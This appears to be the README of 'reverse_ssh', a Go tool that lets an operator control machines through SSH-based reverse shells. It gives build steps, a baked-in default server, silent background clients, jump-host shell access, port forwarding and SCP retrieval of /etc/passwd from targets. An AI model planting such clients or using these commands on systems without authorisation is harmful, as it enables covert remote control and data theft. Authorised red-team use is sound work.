SSH based reverse shell

Reverse SSH

Want to use SSH for reverse shells? Now you can.

  • Manage and connect to reverse shells with native SSH syntax
  • Dynamic, local and remote forwarding with simple jumphost syntax
  • Native SCP implementation for retrieving files from your targets
  • Full windows shell even if the host is not supported by ConPty
  • Mutual client & server authentication to create high trust control channels
    And more!
                    +----------------+                 +---------+
                    |                |                 |         |
                    |                |       +---------+   RSSH  |
                    |    Reverse     |       |         |  Client |
                    |  SSH server    |       |         |         |
                    |                |       |         +---------+
+---------+         |                |       |
|         |         |                |       |
| Human   |   SSH   |                |  SSH  |         +---------+
| Client  +-------->+                <-----------------+         |
|         |         |                |       |         |   RSSH  |
+---------+         |                |       |         |  Client |
                    |                |       |         |         |
                    |                |       |         +---------+
                    |                |       |
                    |                |       |
                    +----------------+       |         +---------+
                                             |         |         |
                                             |         |   RSSH  |
                                             +---------+  Client |
                                                       |         |


git clone

cd reverse_ssh

cd bin/

# start the server
cp ~/.ssh/ authorized_keys

# copy client to your target then connect to the server

# Get help text
ssh localhost -p 3232 help

# See clients
ssh localhost -p 3232 ls -t

| ID                                       | Hostname   | IP Address  |
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |

# Connect to full shell
ssh -J localhost:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac

# Or using hostname 

ssh -J localhost:3232 root.wombo

Setup Instructions

NOTE: reverse_ssh requires Go 1.16 or higher. Please check you have at least this version via go version

The simplest build command is just:


Make will build both the client and server binaries. It will also generate a private key for the client, and copy the corresponding public key to the authorized_controllee_keys file to enable the reverse shell to connect. If you need to build the client for a different architecture.

GOOS=linux GOARCH=amd64 make client
GOOS=windows GOARCH=amd64 make client # will create client.exe

You will need to create an authorized_keys file, containing your public key. This will allow you to control whatever server catches. Alternatively, you can use the --authorizedkeys flag to point to a file.

cp ~/.ssh/ authorized_keys
./server #Set the server to listen on port 3232

Put the client binary on whatever you want to control, then connect to the server.


You can then see what reverse shells have connected to you using ls:

ssh -p 3232 ls
| ID                                       | Hostname   | IP Address  |
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |

Then typical ssh commands work, just specify your rssh server as a jump host.

# Connect to full shell
ssh -J root.wombo

# Run a command without pty
ssh -J root.wombo ls

# Start remote forward 
ssh -R 1234:localhost:1234 -J root.wombo ls

# Start dynamic forward 
ssh -D 9050 -J root.wombo ls

# SCP 
scp -J root.wombo:/etc/passwd .

Fancy Features

Default Server

At build time, you can specify a default server for the client binary to connect to:

$ RSSH_HOMESERVER=localhost:1234 make

# Will connect to localhost:1234, even though no destination is specified
$ bin/client

# Behaviour is otherwise normal; will connect to
$ bin/client

Full Windows Shell Support

Most reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of. This project uses conpty on newer versions of windows, and the winpty library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell.

Foreground vs Background (Important note about clients)

By default, clients will run in the background. When started they will execute a new background instance (thus forking a new child process) and then the parent process will exit. If the fork is successful the message "Ending parent" will be printed.

This has one important ramification: once in the background a client will not show any output, including connection failure messages. If you need to debug your client, use the --foreground flag.

Hi! Im a guy who is passionate about writing golang and security! In my repos you find my a lot of my half and fully baked projects.
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